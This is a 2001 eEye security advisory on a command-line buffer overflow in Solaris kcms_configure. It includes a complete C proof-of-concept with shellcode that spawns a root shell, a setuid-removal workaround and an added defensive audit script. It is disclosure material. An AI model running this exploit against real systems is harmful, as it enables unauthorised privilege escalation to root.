Solaris kcms_configure vulnerability
Release Date:
April 9, 2001
Severity:
Local Root Compromise
Vendor:
Sun Microsystems
Systems Affected:
Solaris 7/8 (x86 and sparc)
Versions prior are also most likely affected
Overview:
It was another long day at eEye where the beer was once again cold, but eEye Wudan member Riley decided it was time to do some Solaris spring cleaning. This is the first of a few advisories to be released on various Solaris bugs that were lying around needing to be cleaned out.
We have discovered a buffer overflow in the kcms_configure utility provided with Solaris 7. The problem exists in the parsing of command line options. By exploiting this vulnerability an attacker can achieve local root privileges. The Kodak Color Management System (KCMS) packages have contained many vulnerabilities in the past; we recommend disabling them if you are not currently using them.
Technical Details:
Proof of Concept:
/*
 * Command line argument overflow
 * /usr/openwin/bin/kcms_configure
 * Proof of Concept Exploitation
 * Riley Hassell of eEye Digital Security
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFLEN 1100

/* seteuid/exec shellcode */
char shell[] =
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
"\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
"\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
"\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
"\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
"\x03\x9a\x04\x04\x04\x04\x07\x04";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

/* Returns the current stack pointer (i386 only; the value is left in %eax). */
unsigned long int get_esp() { __asm__("movl %esp,%eax"); }

int main(int argc, char *argv[])
{
    int i;

    /* Optional first argument adjusts the guessed return address. */
    if (argc > 1)
        offset = strtol(argv[1], NULL, 0);
    else
        offset = -300;
    nop = 600;
    esp = get_esp();

    memset(buf, 0x90, BUFLEN);               /* NOP sled */
    memcpy(buf+600, shell, strlen(shell));   /* shellcode after the sled */
    for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
        *((int *) &buf[i]) = esp+offset;     /* remainder filled with the guessed address */
    buf[BUFLEN-1] = '\0';

    execl("/usr/openwin/bin/kcms_configure", "eEye", "-o", "-S", "X", buf, NULL);
    return 0;
}
Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered. We would like to thank them for working with us on creating a patch for this vulnerability.
Workaround:
chmod -s /usr/openwin/bin/kcms_configure
This will remove the setuid bit from kcms_configure, therefore if someone does exploit this vulnerability, they won’t gain higher privileges.
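The workaround above, as an added example that is not part of the eEye advisory: a POSIX sh script that checks a file for the setuid bit, strips it and confirms the change, and lists the remaining setuid-root files under a directory for review. The only path it assumes is the advisory's own /usr/openwin/bin/kcms_configure.

```shell
#!/bin/sh
# Added example, not part of the eEye advisory: apply the chmod -s workaround
# in a checked, repeatable way and audit what else is setuid-root.

# Exit 0 if the file exists and carries the setuid bit, 1 otherwise.
is_setuid() {
    [ -u "$1" ]
}

# Strip setuid and setgid from the file and confirm both bits are gone.
# Exit 0 on success, 1 if the file is missing or the bits remain.
strip_setuid() {
    [ -f "$1" ] || return 1
    chmod u-s,g-s "$1" 2>/dev/null || return 1
    if [ -u "$1" ] || [ -g "$1" ]; then
        return 1
    fi
    return 0
}

# Print every root-owned setuid file under a directory so the remaining set can
# be reviewed; on Solaris the KCMS tools live under /usr/openwin/bin.
list_setuid_root() {
    find "$1" -type f -user root -perm -4000 2>/dev/null
}

# Apply the workaround to kcms_configure when run as: sh script.sh --apply
if [ "${1:-}" = "--apply" ]; then
    target=/usr/openwin/bin/kcms_configure
    if is_setuid "$target"; then
        strip_setuid "$target" && echo "setuid removed from $target"
    else
        echo "$target is not setuid (or not present)"
    fi
fi
```

Run it again after patching: the vendor patch may restore the setuid bit, and the audit lists what is set at that point.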
Credit:
Riley Hassell
Greetings:
ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, and last but not least… all the kick ass people at Speakeasy.net.
Copyright (c) 1998-2009 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.